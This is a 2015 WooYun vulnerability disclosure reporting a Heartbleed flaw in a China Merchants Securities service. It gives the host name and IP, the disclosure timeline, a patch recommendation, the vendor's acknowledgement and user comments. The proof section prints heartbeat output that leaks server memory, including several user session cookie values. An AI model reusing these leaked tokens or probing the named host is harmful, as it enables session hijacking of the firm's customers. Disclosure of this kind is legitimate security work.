当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125067

漏洞标题:招商证券某服务存在心脏滴血漏洞

相关厂商:招商证券股份有限公司

漏洞作者: 路人甲

提交时间:2015-07-07 17:25

修复时间:2015-08-21 18:14

公开时间:2015-08-21 18:14

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-07: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

招商证券某服务存在心脏滴血漏洞

详细说明:

ip: 210.21.232.117	
对应域名: kh.newone.com.cn

漏洞证明:

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3902
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
.@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.r-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; .NET CLR 2.0.50727)..Host: kh.newone.com.cn..Connection: Keep-Alive..Cookie: PLAY_SESSION=e9e139febb2c06888ddd2c26a86bc656143f7435-%00___ID%3A56cafc67-394d-4623-b850-6bf4e650c7db%00....dR..4..u..<..4%00.zn.+D.~.;.6=108..Cache-Control: max-age=0..Accept-Language: zh-cnZ..pN..i...n.Y.....V.*.W'.B....ie-Match: "1430285244000-91259055"..If-Modified-Since: Wed, 29 Apr 2015 05:27:24 GMT.GF..c.....g...4.{...R...H]..k....@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.ttp://www.lenovomobile.com/admin/module/product/DownFile/Lenovo_P770_UAProfile.xml..X-Requested-With: com.android.browser..User-Agent: Mozilla/5.0 (Linux; U; Android 4.1; zh-cn; Lenovo-P770/S100) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Mobile Safari/534.30..Accept-Encoding: gzip,deflate..Accept-Language: zh-CN, en-US..Accept-Charset: utf-8, utf-16, *;q=0.7..Cookie: PLAY_FLASH=; PLAY_ERRORS=; PLAY_SESSION=a8035aaf0b9650299cc093fac9d7e6c3e334155d-%00___ID%3A0399648f-f2d9-486f-960b-4e7fb80fb170%00....o.jd.U;.Z.U ..3....(
Cookie: PLAY_SESSION=cc47ef06f8903f21bd69e50ae6c0e2fb2a2c8c18-%00___ID%3A3172654b-b83a-4caf-80c8-c973c80e3848%00
Cookie: PLAY_FLASH=; PLAY_ERRORS=; PLAY_SESSION=68be5f56e8cedfdaf1f2df63bced213ed5600ec5-%00___ID%3A84380cdc-7168-4282-92e6-a070b2ad4707%00
Cookie: PLAY_SESSION=2f2823a0e3162f286443c2508290209c5876e36b-%00___ID%3A01fee1cd-1bac-4b97-b38c-2208c50298fa%00
Cookie: CNZZDATA5717826=cnzz_eid%3D436430477-1436229992-https%253A%252F%252Fkh.newone.com.cn%252F%26ntime%3D1436229992; PLAY_SESSION=6d943f5e3541cfc37f7ac3f41dc793adfb0bd842-%00___ID%3A9f02ba4d-486e-408d-968c-2d36123ed093%00

修复方案:

打补丁或者升级到最新版本

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-07 18:12

厂商回复:

谢谢,我们会尽快修复

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-07 17:27 | 浮世浮城 ( 普通白帽子 | Rank:284 漏洞数:60 | 我存于这俗世烟火的浮世,我爱这时光倒影的...)

    现在都在搞证券了么

  2. 2015-07-07 17:29 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @浮世浮城 估计是最近炒股票的人越来越多了,接触这个的同学也越来越多,当然股票跌的太厉害了,所以。

  3. 2015-07-07 17:29 | 嘟嘟丶小神奇 ( 路人 | Rank:2 漏洞数:1 | 嘟嘟丶小神奇)

    现在都在搞证券了么